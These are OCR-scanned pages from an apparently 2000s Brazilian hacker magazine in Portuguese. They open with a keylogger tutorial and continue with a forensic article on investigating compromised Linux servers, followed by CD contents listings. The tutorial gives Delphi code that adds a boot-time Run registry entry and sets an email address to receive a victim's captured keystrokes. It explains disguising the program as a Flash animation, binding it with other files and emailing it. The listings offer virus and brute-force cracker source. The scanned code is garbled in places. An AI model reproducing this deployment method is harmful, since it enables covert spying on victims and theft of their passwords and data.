reYOptimize”, dentro do valor “email”. 

Agora faremos um programa em delphi 
para registrar um endereço de e-mail 


predeterminado: 


procedure TForml. 


Formlreate(Sender: TObject); 
var 
Registro: TRegistry; 
WINDIR, NOME, XP: STRING; 
begin 
Registro:=TRegistry. 
create; 
Registro. 
Rootkey:=HKEY LOCAL MACHINE; 
Registro. 


Openkey (*SOFTWARENMicro- 
softiWindowsiCurrentVersion”, 
TRUE); 
//Nerifica qual o sistema 
operacional (win9x ou XP) 
windir:=Registro.ReadS 
tring('SystemRoot'): 

If windir<>”” then // 
se windir não é string vazia, 
então o sistema é win9x ou ME 

begin 

nome:=windir+'N 
Systemicapta.exe”; 
REGISTRO. 
Openkey(“Run”, TRUE); 
REGISTRO. 
WriteString('Sys0OkK”, nome): 
end 

else //se a variável 
windir é vazia, o sistema é 
winXP 

begin 
XP:=Registro. 
ReadString(“*ProgramFilesDir”) 
windir:= 


Windir:=XPL 
1]+XP[2]+XPL3]+"WINDOWSAsys- 
tem32icapta.exe”; 

[1 XPLIJ+XPIZ]+XPI3] = 
(Ex eubtrio 


drive 


REGISTRO. 


Openkey(“Run”, TRUE); 


REGISTRO. 
WriteString('SysOK”, windir) 
end; 

Registro.Rootkey:= 
RENT USER; 

Registro.0Openkey (*SOFTWAREN 
Optimize”, TRUE); 

Registro.WriteString(“email”, 
“julianotoledoQuol.com.br”); 

( 

“julianotoledo.uol.com.br” é o 
endereço de e-mail para o qual 
serão enviadas as informações 
colhidas do computador da víti- 
ma. Troque-o pelo endereço que 
lhe convier. 

) 


HKEY. CUR- 


registro.Closekey; 
registro.Free; 
end; 


Com isso, o programa viral será roda- 
do sempre que o Windows for iniciado, e 
o e-mail já ficará ajustado. Caso queira 
torná-lo mais ágil, faça-o como console 
do DOS. Para disfarçá-lo, fazendo-o 
parecer com animação Flash, mude o 
ícone dele para o de uma animação, 
ainda no Delphi. 

Agora usaremos o programa Alloy 
para esconder os arquivos virais dentro 
do nosso programa. 

Na janela principal do programa, sele- 
cione o arquivo do executável elaborado 
acima, na caixa Input Filename; em 
Output Filename, determine qual será 
o nome do executável originado após a 


camuflagem - é importante que não seja 
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igual ao indicado no campo Input Filena- 
me -, como mostra a tela a seguir: 


Alloy - Untitled 


IMAGEM 7 

Certifique-se de que serão salvos na 
pasta system ou system32, conferindo 
a opção [SysDir] na coluna Directory. Se 
precisar mudar o diretório em que serão 


salvos, use a opção drag: 
IMAGEM 5 


Agora escolha a guia Other Files e pres- 
sione o botão indicado: 


Alloy - Untitled 


IMAGEM 8 

Use a opção Compile para que seja ela- 
borado o pacote de programas.Este será 
salvo no diretório indicado anteriormente 
na opção Output Filename: 


E Alloy - Untitled 


IMAGEM 6 
Vá até o diretório system (para Windo- 
ws 9x/ME) ou system32 (para Windows 


XP) e selecione os arquivos virais que 
serão incorporados ao programa: 


IMAGEM 9 

Quando executado o programa-pa- 
cote no computador alvo, acontecerá 
o seguinte: 


1º: Será processado o programa que 
fizemos para preparar o terreno ao 
vírus (gravar o e-mail no registro do 
Windows e configurar a inicialização do 
sistema para carregar o vírus a partir do 
próximo boot); 


2º: Os arquivos virais (executável e dll) 
serão salvos no diretório que indicamos 
(system ou system32). 


Dessa forma, no próximo boot do 
sistema, O vírus será iniciado junto com 
o Windows, capturará tudo o que for di- 
gitado, armazenando isso em um arquivo 
de texto que será remetido ao e-mail 
que indicamos. Vale a advertência: até a 
data em que esta matéria foi finalizada 
(18/06/2003), os programas antivírus 
ainda não detectavam o programa em 
pauta como vírus. 

Agora pode ser enviado por e-mail como 
se fosse o executável de uma animação em 
Flash. Mas reitera-se que essas informa- 


ções não são para fins ilícitos. 
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mbora aconteçam com bas- 
tante frequência, os proble- 
mas de invasão ainda não 
são tratados com a devida 
relevância. Muitos casos nem chegam 
a ser registrados e alguns administra- 
dores acabam adotando soluções do 
tipo“formatar a máquina, configurar, 
levantar o backup”, esquecendo que 
o invasor pode retornar e utilizar as 
mesmas vulnerabilidades que ele pró- 
prio explorou. 
Vamos imaginar o caso de uma empresa 
que já começa a semana com um problema 
do seguinte tipo: 


“Segunda-feira, 8:30 da manhã, mais 
uma semana está começando e o ad- 
ministrador de rede vai pegar seu café. 
Ao voltar para sua sala, o telefone toca 
insistentemente e ele atende na maior 
tranqgiilidade. A voz da secretária da 
diretoria se faz presente: 

- Bom dia, estamos com um problema, 
não consigo passar e receber e-mails. 

- Vou verificar e te ligo já, já. 

Mal o administrador coloca o tele- 
fone no gancho e ele toca novamente. 
Desta vez, é o gerente dizendo que não 
consegue acessar a Internet. 

Novamente, ele responde que vai 
verificar o que está acontecendo. O 
telefone toca várias vezes até que ele 
decide tirá-lo do gancho para investigar 
o ocorrido. 

Ao ligar o monitor de seus servidores, 
constata que há algum problema. En- 
quanto um não responde aos comandos, 
o outro está com suas configurações de 
rede totalmente erradas e, um terceiro, 
aparentemente está travado. 

Após reinicializar o sistema, nosso 
administrador desconfia que existe algo 


muito grave acontecendo. De repente, 
uma mensagem aparece na tela com os 
seguintes dizeres: 

- Sorria, você foi invadido !” 


A ANÁLISE DO AMBIENTE 


O fato que acabamos de descrever 
realmente aconteceu em uma empresa 
que teve cinco de seus servidores Linux 
totalmente invadidos, sendo que em um 
deles ainda verificou-se uma série de 
informações apagadas. 

O administrador, desesperado, tinha 
o objetivo formatar as máquinas e co- 
meçar do zero, recuperando, assim, seu 
backup diário. 

Porém, um dos diretores teve a 
“presença de espiríto” de chamar 
alguém que pudesse recuperar as in- 
formações destruídas pelo invasor e, 
assim, levantar a origem do atacante. 
Obviamente, esse problema não era 
nada simples. Contudo, era necessário 
que isso fosse feito para que tais evi- 
dências pudessem ser recuperadas. 

Foram escolhidas duas máquinas 
para que pudessem “falar” algo a 
respeito do ocorrido. O “relatório” 
obtido continha as informações des- 
critas abaixo: 


O FIREWALL 

Firewall baseado em Linux Slackware 
9.0 com HD de 10 GB, 128 MB de RAM, 
placa de rede, unidade de CD, teclado e 
monitor. 


O SERVIDOR WEB 

Um servidor baseado em Linux Slack- 
ware 9.0 com HD de 40 GB, 512 MB 
de RAM, placa de rede, unidade de CD, 
teclado e monitor. 


O primeiro passo - e talvez o mais im- 


portante — é tirar uma cópia dos HDs, para 
que se preserve os dados e, assim, permitir 
que seja feita a análise do ambiente. Esse 
procedimento é feito, normalmente, de 
maneira errônea por muitos especialistas 
que não “esterilizam” (esse é um dos termos 
utilizado na área forense computacional) 
as mídias. Foram pegos dois HDs, um de 
10 GB para o firewall e um de 40 GB para o 
servidor de correio. 

Ambos foram colocados em um Linux 
preparado para executar sua cópia e a 
preparação. Os discos rígidos foram 
guardados em uma gaveta própria e 
tiveram seus conteúdos zerados da 
seguinte maneira: 


dd if=/dev/zero of=/dev/ 
hdb 


Esse comando coloca caracteres do 
tipo null no HD alvo, acabando, assim, 
com qualquer “lixo” eventual que poderia 
atrapalhar a investigação. 

Tal procedimento foi feito nos dois HDs 
que receberão a cópia dos dados dos mo- 
delos originais. Em seguida, faremos um 
backup de cada um deles para os discos 
de destino. O comando adotado será o 
seguinte: 


Í dd if=/dev/hdb of=/dev/hdc 


Em que hdb é o HD original in- 
vadido e hdc o esterilizado, que 
receberá a imagem desse HD. Esse 
procedimento deverá ser feito nos 
dois discos. 


COLOCANDO O SISTEMA 
PARA FUNCIONAR 


Com os dados originais preservados, 


teremos, agora, de colocar esse disco rí- 
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gido em uma máquina Linux similar a que 
foi invadida para passarmos ao segundo 
nível de análise. 

Alguns analistas gostam de trabalhar 
de maneira simulada, mas, às vezes, a 
técnica “on the fly” traz resultados mais 
interessantes. Com ela, podemos fazer 
diagnósticos “em produção”. 

Nesta fase, algumas pessoas vão 
procurar interfaces em modo promís- 
cuo (em busca de sniffers) e, assim, 
ir atrás dos logs do sistema. 

Vamos esquecer imediatamente 
esse tipo de procedimento, pois 
somente um amador utilizaria tais 
ferramentas. 

Contudo, a verificação do funciona- 
mento do seu sistema pode ser feita com 
algumas ferramentas simples e comuns, 
antes de passarmos para uma análise 
mais rebuscada, em devices do tipo mem e 
kmem. Para isso, utilizaremos uma análise 
considerada corriqueira em alguns pontos 
do sistema. 


a) Análise dos logs do sistema: 


Mesmo que o diretório /var/log não 
diga nada, uma análise detalhada 
dos logs pode trazer alguns pontos 
importantes para o começo do 
trabalho. Abaixo existem alguns 
arquivos que devem ser obser- 
vados. 

—- messages: principal arquivo de 
log, normalmente apagado; 

- wtmp: armazena as últimas 
conexões ao sistema. Este arquivo 
pode ser visto com o comando 
last. Uma dica seria colocar uma 
cópia em um disquete formatado e 
montado no diretório /mnt/floppy 
com o comando 


last »/mnt/floppy/logins.txt 


- secure: mostra os últimos logons 
do sistema; 

- cron: exibe os mais recentes logs 
do cron. 


FAZENDO A AUTÓPSIA 
INICIAL DO CADÁVER 


Se você tiver a sorte de encontrar esses 


arquivos intactos, eles poderão revelar 
muita coisa. Mas dificilmente um invasor 


Análise de Primeiro Nível experiente os manterá intactos. 


Inicialmente, um invasor deve deixar 
sua presença mais incógnita possível. É 
muito comum a instalação de rootkits 
baseados em LKM, que corrompe as ta- 
belas de syscalls e cria toda uma espécie 
de comportamento, ocultando certos 
procedimentos. 

Normalmente, a invasão de um site é 
feita por vulnerabilidades baseadas em 
buffer overflows, que permitem que a 
shell de root aja remotamente e, a partir 
daí, fazem a ponte para o box do invasor 
com o sistema invadido. 

Contudo, existem alguns pontos clás- 
sicos que devem ser observados pelo 
especialista. São eles: 


b) O esquecido comando history:- 
por incrível que pareça, algumas 
pessoas esquecem que o comando 
history pode revelar várias infor- 
mações interessantes. 

O arquivo .bash, history, contido 
no diretório do root, normalmente 
guarda os últimos 1.000 comandos 
digitados. Contudo, muitos invaso- 
res o inibem por meio do simples 
comando unset HISTFILE. 


c) Scanners de portas: um siste- 
ma em produção tem serviços de 


rede em andamento. Um scanner 


de porta, como o nmap, por exem- 
plo, pode revelar portas abertas que 
originalmente não foram feitas pelo 
administrador. 

É sempre interessante passar um 
scanner no sistema para verificar 
se existe alguma porta estranha. 
No entanto, os procedimentos 
acima são considerados básicos. 
Só no caso de um invasor amador 
poderão ser reveladas algumas de 
suas técnicas. 


ANÁLISE DE SEGUNDO NÍVEL 


Nesta segunda análise, buscaremos 
algumas técnicas mais rebuscadas em 
termos de invasão. 

Partimos do pressuposto de que nosso 
invasor possui um conhecimento bem mais 
profissional nos assuntos anteriormente 
apresentados, mas ainda não trabalha com 
o “estado da arte” em comprometimento 
de sistemas. 

Inicialmente, vamos em busca de diretó- 
rios ocultos com alguns nomes muito co- 
muns. Utilizando o comando find, faremos 
as seguintes varreduras: 


find / -name 

find names” 
find / -name “...” 
find / -name “.*” 


Os nomes acima são os preferidos para 
ocultar a presença de diretórios de ferra- 
mentas dentro de um sistema. 

Em um segundo momento, faremos 
nossa procura por rootkits. Hoje, existem 
vários tipos, tais como: 


Rootkits de primeira geração- 
Nesta primeira geração, os rootkits 
eram programas de sistemas modifi- 
cados. Um exemplo clássico era o caso 
do programa GNU ifconfig. Primeiro, 


a função desse programa é configu- 
rar/alterar dispositivos de rede pre- 
sentes no sistema. Além disso, por 
meio dele, era possível visualizar as 
configurações de um dispositivo e, o 
que é mais importante, verificar se um 
deles estava em modo promíscuo. 

O modo promíscuo ocorre quando 
uma interface está recebendo qual- 
quer pacote de maneira passiva, ou 
seja, tudo que estiver trafegando em 
um segmento de rede é capturado. 
Normalmente, os programas que agem 
dessa forma são os sniffers. 

Os sniffers são programas pre- 
sentes, quase que obrigatoriamente, 
em rootkits. Sua função é capturar 
pacotes e, assim, conseguir senhas 
não criptografadas de usuários e/ou 
administradores. 


Rootkits de segunda geração: Nesta 
segunda fase, os rootkits deixaram de lado 
a preocupação de modificar programas do 
sistema e começaram a fazê-lo através de 
módulos de kernel (LKMS), as system calls 
do sistema. 

As system calls representam funções de 
baixo nível que o sistema operacional utiliza 
para executar determinadas operações. Os 
desenvolvedores de rootkits procuravam 
criar módulos de kernel que alterassem 
essas system calls e as substituíssem por 
funções totalmente modificadas. Isso causa- 
va anomalias como ocultação de processos, 
de arquivos e diretórios, carregamento de 
módulos de kernel que ocultavam outros 
módulos e a si mesmos, entre outras ca- 
racterísticas interessantes como sniffers, 
backdoors etc. 


Rootkits de terceira geração: “/ 
dev/kmem is our friend”, cita assim 
o artigo “Linux on-the-fly kernel pac- 
thing without LKMI[Sk e Devik 2001]”, 


que trouxe à tona uma nova geração 
de rootkits. Na segunda geração dos 
rootkits, com a retirada do suporte 
para carregamento de módulos, foi 
neutralizada a sua ação em quase 
95%. O administrador inibia uma 
função facilitadora, mas ganhava 
muito em segurança. 

O Linux possui um dispositivo co- 
nhecido como kmem (Udev/kmem), 
que possui o direito de escrita e 
leitura somente pelo root. 

Esse dispositivo abstrato tem 
como função traduzir a memória 
virtual utilizada pelo kernel para a 
memória real (/dev/mem), ou seja, 
faz o endereçamento da memória 
real+swap. Esse tipo de rootkit cria 
uma tabela particular de syscalls e 
desvia o entry point do kernel na 
direção dela. 

Existem ferramentas muito boas para 
realizar a análise, podemos citar duas: 


a) chkrootkit - Detecta a maioria 
dos rootkits do mercado (http:// 
www.chkrootik.org). 

b) rootcheck - Outra excelente fer- 
ramenta que detecta a presença 
de rootkits (http://www.ossec. 
net/rootcheck/). 


Normalmente, sistemas que não pos- 
suem programas de verificação, como o 
Tripwire ou o Lstat, podem ser vítimas 
de rootkits e serem primeiramente de- 
tectados por essas ferramentas. 

Além disso, podemos verificar por 
meios do MAC (Modifiey, Acess, Cre- 
ation/Change) os arquivos dentro do 
sistema. Isso pode ser feito através do 
comando que segue: 


find 
root 


-type f 
-perm +111 


SHSsE 
-prin- 


v 
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tf CLTYATMATALTHETMETS 
bh/%f in” | sort -nr 


Se você quiser direcionar para um 
arquivo no disquete, coloque a opção 
>/mnt/floppy/nomedoarquivo.txt no 
final do comando. 

Existe a possibilidade de repetir o procedi- 
mento citado acima para criarmos um históri- 
co de execução de comandos no sistema: 


find “Ly pés fo 
permgiil oprintr 
CHAYLAMLATLAHLAME£AS 


hh/%f in” | sort -nr 


E a seguir, você pode conferir o procedi- 
mento final para os arquivos recentemen- 
te criados: 


find “type f - 
pen ELI sprint 
ChCYXCmACdALCHACMECS 


bh/%fin” | sort -nr 


Desta maneira, podemos ter uma idéia 
dos arquivos devidamente modificados ou 
acessados em nosso sistema. 


Agora, tiraremos um raio X de dois 
dispositivos importantes do Linux, o 
/dev/mem e o /dev/kmem que, como já 
dissemos, são um retrato da memória do 
sistema. Para isso, executaremos dois 
comandos: 


dd if = /dev/kmem of = 
kmem.txt 

dd if =/dev/mem of= mem. 
txt 


Assim, teremos “on the fly “ um retrato 
(dump) da memória do computador para 
posterior análise. 


Outro ponto é observar os processos em anda- 
mento. Para isso, basta digitar o comando: 


| ps auexww > processos.txt 


Teremos uma lista completa dos proces- 
sos com um número de detalhes bastante 
considerável. Para que possamos visuali- 
zar o processo de abertura de arquivo (s) 
durante seu tempo de vida, digite: 


Isof -p PID do processo es- 
pecífico. 


MAS POR QUE ISSO ? 


Isso é importante para verificarmos 
quais bibliotecas, arquivos e binários po- 
dem ser invocados durante o seu tempo 
de execução. Também é muito importante 
na busca de processos não usuais e em 
programas que não deveriam rodar no 
sistema. 

Em um segundo nível de análise, po- 
demos fazer uso do utilitário strace para 
visualizar tanto as system calls como os 
signals de um processo. Veja um exemplo 
abaixo (strace -p PID de um processo) do 
processo do comando clear: 


rootto]dmbox:/devit strace 
clear 
execve(“/usr/bin/clear”, 
[*clear”], [/* 31 vars 


7/8 DO 

brk(0) 

0x804972c 
open(“/etc/ld.so.prelo- 
ad”, O RDONLY) | 


ENOENT (No such file or 
directory) 
open(“/etc/ld.so.cache”, 
O RDONLY) = 3 
fstat64(3, (st mode=S . 
IFREG/0644, st size-63828, 


aces )===0 

old mmap(NULL, 63828, PROT. 
READ, MAP PRIVATE, 3, 0) = 
0x40015000 

close(3) = 0 
open(“/Tib/libncurses.so.5”, 
O RDONLY) = 3 

read(3, “NI77ELFNINININOAONO 
NONONONONONON3NON3NO NINO NONO 
W34010”..., 1024) = 1024 
fstat64(3, (st. 

mode=S IFREG/0755, st. 
S1Z6=242:128;====) )==20 
old mmap(NULL, 244236, 
PROT READ|PROT EXEC, 

MAP PRIVATE, 3, 0) = 
0x40025000 
mprotect(0x40058000, 
35340, PROT NONE) = 0 
old mmap(0x40058000, 
36864, PROT READ|PROT 
WRITE, MAP PRIVATE [MAP 
FIXED, 3, 0x32000) = 
0x40058000 

close(3) 

e () 
open(“/lib/libc.so.6”, 

O RDONLY) == 

) e! 
munmap(0x40015000, 4096) 
O 
cexit(0) 


Esse ponto é muito importante, já que 
podemos detectar o que o programa está 
abrindo em se tratando de libs e, principal- 
mente, seu comportamento na memória. 

Para processos em andamento ou mes- 
mo em execução, esse “espelho” do seu 
funcionamento é muito útil na análise que 
poderemos desempenhar. 

Para essa parte, tiraremos um espe- 
lho da rede de maneira mais completa. 
Inicialmente, utilizando o “velho” 


— 
r 


netstat, verificaremos o status das 
conexões: 


rootQwebmail:/devit netstat 
Active Internet connections (w/o 
servers) 

Proto Recv-Q Send-Q Local Address 
Foreign Address State 


tcp 0 O servidor.com. 
br:ssh 10.0.0.1:44073 TIME WAIT 
tcp 0 O servidor.com. 
br:ssh 10.0.0.1:44351 TIME WAIT 
tcp 0 O servidor.com. 
br:sssh 10.0.0.1:44157 TIME WAIT 
tcp 0 O Toca- 

Thost :49241 Toca- 
lhost:10025 TIME WAIT 

tcp 0 O servidor. 
com.br:ssh 2000000000.user. :1960 
ESTABLISHED 

tcp 0 O Toca- 
lhost:10024 loca- 

Thost : 49240 TIME WAIT 


Active UNIX domain sockets (w/o 


servers) 

Proto RefCnt Flags Type 
State I-Node Path 

unix 18 Es] DGRAM 
193 /dev/log 

unix 2 [1 DGRAM 
1087094 

unix 3 [] STREAM 
CONNECTED 1087092 private/ 
rewrite 

unix 3 [] STREAM 
CONNECTED 1087091 


Aqui, temos as conexões ao vivo dessa 
máquina, ou seja, como ela está na Internet, 
sendo vista a partir do mundo exterior. 

Normalmente, com o scanner que apre- 
sentamos anteriormente, podemos detectar 
quais portas estão abertas no sistema. Mas 
nesse caso, observamos as conexões em 
tempo real. 


CONCLUSÕES FINAIS 


Nessa primeira parte de nosso artigo, 
fizemos uma preparação para realizarmos 
uma análise mais profunda do sistema 
comprometido. 

É importante ressaltar os seguintes 
tópicos apresentados: 


a) À preservação do ambiente; 

b) Um estudo do sistema ao vivo (on 
the fly) para podermos visualizar seu 
funcionamento e detectar anomalias 
iniciais. 


De posse desse primeiro laboratório, no 
próximo artigo, continuaremos a dissecar 
nosso cadáver procurando, dentro dele, 
informações importantes que podem ser 
traduzidas em: 


a) Arquivos apagados; 

b) Checagem de system calls; 

c) Observação de pacotes de entrada e 
de saída da máquina, com um sniffer; 
d) Observação de alguns processos 
relacionados a core dumpeds e es- 
tudos de geração de sinais anômalos 
(sigsegyv, sigkill etc.). 


Esperamos, assim, ilustrar melhor o 
assunto e mostrar como uma análise pode 
identificar um invasor de sistemas. 
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to simples: basta inseri-lo na gaveta do seu CD-ROM e 
aguardar alguns instantes até a abertura completa da tela 
principal. Caso o recurso de auto-reprodução não esteja 
ativado, acesse a interface clicando em Executar, no menu 
Iniciar do seu Windows, e digite a letra correspondente 
ao seu drive de CD-ROM (D: ou E, por exemplo) e o 
comando “BROWSER.EXE”. Pronto! A interface será 
exibida e estará pronta para a navegação. Agora, confira 


o que a nossa equipe preparou para você. 


ESSENCIAIS 


Acrobat Reader 5 - Visualize, navegue e 
imprima PDF, em seu browser. 

Flash Player v7.0 (IE) - Última versão do 
plug-in para o principal formato de animação 
para Web. 

Microsoft Windows Installer v2.0 
- Patch da Microsoft necessário para a 
instalação de pacotes de programas com 
a extensão MSI. 

WinRAR v3.40 - Compactador para 
Windows que possui suporte para os 
formatos RAR, ZIP, CAB, ARJ, LZH, 
versões GUI e opção de recuperação 
de dados. Oferece melhor encriptação, 
comentários ANSI, Self-Extractor, 
DOS e 05/2. 


KIT ACESSO 

Discador Geeko (Win32) - O discador Geeko 
(Geek Connect) é diferente dos outros por 
permitir que você se conecte à Internet gratui- 
tamente e sem preencher nenhum cadastro. 
O Geeko atende a mais de 1.600 cidades por 


todo território brasileiro e oferece conexão de 


O procedimento para acessar a interface do CD é mui- 


escolha o melhor carinho 


WINDOWS 
FIREWALL 


CRACKINS 


ANONYMOUS 


PROTEÇÃO 
HONEYPOTS 


qualidade com linhas sempre desocupadas 
(http:/Awmww.geek.com.br/geeko). 
Download Acelerator - Um dos melhores 
gerenciadores e aceleradores de downloads. 
ICQ Lite — Versão light e em português do 
Instant Messenger mais famoso do mundo. 


PROTEÇÃO 

Avast! Virus Cleaner - Ferramenta que auxi- 
lia na remoção de worms no computador. 

Cyber-Defender 5.00 - Proporciona defe- 
sa, em tempo real, perante todos os tipos 


de vírus e ataques. 


ANONIMOUS 

*l Evidence Killer 2.0 — Elimina todas as evi- 
dências e histórico de atividades do computador. 
O software exclui cookies, cache, histórico, 
histórico de aplicações recentes, arquivos tem- 


porários, lixeira, documentos recentes etc. 


FIREWALL 
AlertWall Personal Firewall Spyware Blo- 
cker 2.6 — Previna-se de invasores com um 


firewall. O programa bloqueia a entrada de 


iria emomareo : 2 [tiro 


MAIS DE 1000 
CODAGOS - FONTE DE 


TRUSTIX 


intrusos e de spywares para que não lhe 


enviem nada pela Internet. 


CRACKING 
Crackwhore 2.0 (SRC) - Código-fonte do 


programa de invasão via Brute Force. 


REGISTRO DO WINDOWS 


Advance Registry War - Ferramenta 
especial para configurar e personalizar a 
aparência do Windows e alterar diversas 


opções escondidas. 


TRUSTIX SECURE LINUX 


É um projeto com intuito de construir 
uma distribuição Linux o mais segura pos- 
sível para utilização como servidor. Possui 
FreeS/WAN, OpenSSL, OpenSSH, Apache 
com SSL e PHP, Postfix como MTA, POP3 
e IMAP com suporte SSL, Proftpd, ftpd- 
BSD e PostgreSQL. 


VIRII 


Vírus — Códigos-fonte de vírus divididos por 
ordem alfabética. 
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características seu COMPUTADOR ESHÁ PROTEGIDO? 


de vírus para 
exemplificar o ê 
funcionamento de a 
uma infecção 


ESSENCIAIS 
Acrobat Reader 5 - Visualize, navegue e 
imprima PDF, tipo de arquivo comum em 
documentações gerais, em seu browser. 

Flash Player v7.0 (IE) - Última versão do plug-in 
para o principal formato de animação para Web. 
Microsoft Windows Installer v2.0 - Patch 

da Microsoft necessário para a instalação de 
pacotes de programas com a extensão MSI. 
WinRAR v3.40 - Compactador para Windows 
que possui suporte para os formatos RAR, 

ZIP, CAB, ARJ, LZH, versões GUI e opção 

de recuperação de dados e oferece melhor 
encriptação, comentários ANSI, Self-Extractor, 
DOS e 05/2. 


KIT ACESSO 
Ashampoo - Acelerador de conexão à Internet. 
Discador Geeko (Win32) - O discador Geeko 
(Geek Connect) se diferencia dos outros 
por permitir que você se conecte à Internet 
gratuitamente e sem preencher nenhum 
cadastro. O Geeko atende a mais de 1.600 
cidades por todo o território brasileiro, 
oferecendo conexão de qualidade com linhas 
* sempre desocupadas (http://www.geek.com. 
br/geeko). 
Download Accelerator - Um dos melhores 
gerenciadores e aceleradores de downloads. 
ICQ Lite - Versão simplificada e em português 
do Instant Messenger mais famoso do mundo. 


PROTEÇÃO 

Avast! Virus Cleaner - Ferramenta 
desenvolvida para auxiliar na remoção de worm 
no computador. 

Cyber-Defender 5.00 - Proporciona a defesa, 
em tempo real, de todo tipo de vírus e ataques. 
PhishGuard 1.1 - Detecta e bloqueia ataques 
do tipo Phishing ou Spoofing, projetados para 
roubar dados pessoais. 

S.W.A.T. Pro 1.0 - Verifica vulnerabilidades 
associadas a defeitos de softwares, contas de 
usuários e configurações. 


BA COMO PODEM SER INVADIDOS OS SISTEMAS QUE RODAM PHP 


DEPOIS DA 
INVASÃO 


Ensinamos 

a recuperar 
informações 
após um ataque 
ao sistema 
operacional 
Linux 


ANONIMOUS 

*1 Evidence Killer 2.0 - Elimina todas 

as evidências de navegação e o histórico 

de atividades do computador. O software 
elimina cookies, cache, histórico, histórico de 
aplicações recentes, arquivos temporários, 
lixeira, documentos recentes etc. 

12Ghosts Wash 7.07 - Limpa arquivos 
desnecessários, que só ocupam espaço. 
Funciona com o PACT ShutDown, limpando 
histórico, documentos recentes, endereços 
digitados do IES (com os respectivos dados do 
Registro) e pasta temporária. 


FIREWALL 

AlertWall Personal Firewall Spyware Blocker 
2.6 - Previna-se de invasores com um firewall. 
O programa bloqueia a entrada de intrusos 

e spywares para que não enviem nada pela 
Internet. 

Armor2net Personal Firewall 3.12 - Protege 
contra a ação de invasores e arquivos 
maliciosos, tais como worms, trojans e 
spywares. O programa possui diversos recursos 
interessantes, que garantem a privacidade e a 
segurança, além de um antipop-up. 

Enigma Firewall 1.1 - Software desenvolvido para 
proteger a privacidade e prevenir o acesso não 
autorizado ao sistema. Controla todos os acessos 
de maneira segura. 


CRACKING 

Advanced ARJ Password Recovery 2.0 - 
Recupere arquivos ARJ protegidos com senha. 
O programa usa de força bruta para conseguir 
a senha perdida, atacando com 30 milhões de 
senhas por minuto. 

Crackwhore 2.0 (SRC) - Código-fonte do 
programa de invasão via Brute Force. 

MDS - Brute Force Cracker escrito em Perl. 
Números - Gere listas com senhas numéricas 


com este aplicativo. 
pop3vscan-0.4 - Um daemon totalmente 


O conteúdo do CD brinde é composto por programas 
freeware, shareware e versões de demonstração. 


Configuração mínima do equipamento: processador 
Pentium Il ou superior com 64 MB de RAM, placa de 


vídeo com 16 MB, resolução de 800x600 pixels e 16 
milhões de cores, placa de som e drive de CD-ROM 2x. 


Alguns programas, por motivos alheios à nossa 
vontade, podem não rodar no Windows XP. 


transparente que faz a varredura de todos 

os correios à procura vírus usando scanners, 
iptables/netfilter. 

TuxFRW - Ferramenta completa de automação 
de firewalls para GNU/Linux. 


REGISTRO DO WINDOWS 

Advance Registry War - Ferramenta especial 
para configurar e personalizar a aparência do 
Windows e alterar diversas opções escondidas. 
NT Registry Drill - Realiza uma análise 
detalhada e precisa do Registro do Windows 

à procura de supostos erros. Segundo o 
fabricante, o software contém uma lista com 
15 erros de Registro, que outros programas da 
mesma categoria não tem. 


TRUSTIX SECURE LINUX 


Projeto com intuito de construir uma 
distribuição Linux o mais segura possível para 
utilização como servidor. Possui FreeS/WAN, 
OpenSSL, OpenSSH, Apache com SSL e PHP, 
Postfix como MTA, POP3 e IMAP com suporte 
SSL, Proftpd, ftpd-BSD e PostgreSQL. 


VIRII 


Vírus - Códigos-fonte de vírus divididos por 
ordem alfabética. 


E MUITO MAIS! 


